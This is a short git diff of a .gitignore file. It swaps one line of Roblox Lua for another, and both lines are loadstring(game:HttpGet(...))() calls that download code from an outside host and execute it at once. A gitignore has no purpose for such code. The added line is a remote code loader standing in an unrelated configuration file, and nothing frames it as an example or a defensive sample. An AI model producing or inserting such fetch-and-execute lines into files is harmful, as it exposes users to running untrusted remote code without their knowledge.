--- a/.gitignore
+++ b/.gitignore
@@ -1,1 +1,1 @@
-loadstring(game:HttpGet("http://project.webcats.cn/bx/41981/8061"))()
+loadstring(game:HttpGet(('http://project.webcats.cn/bx/41981/8622')))()
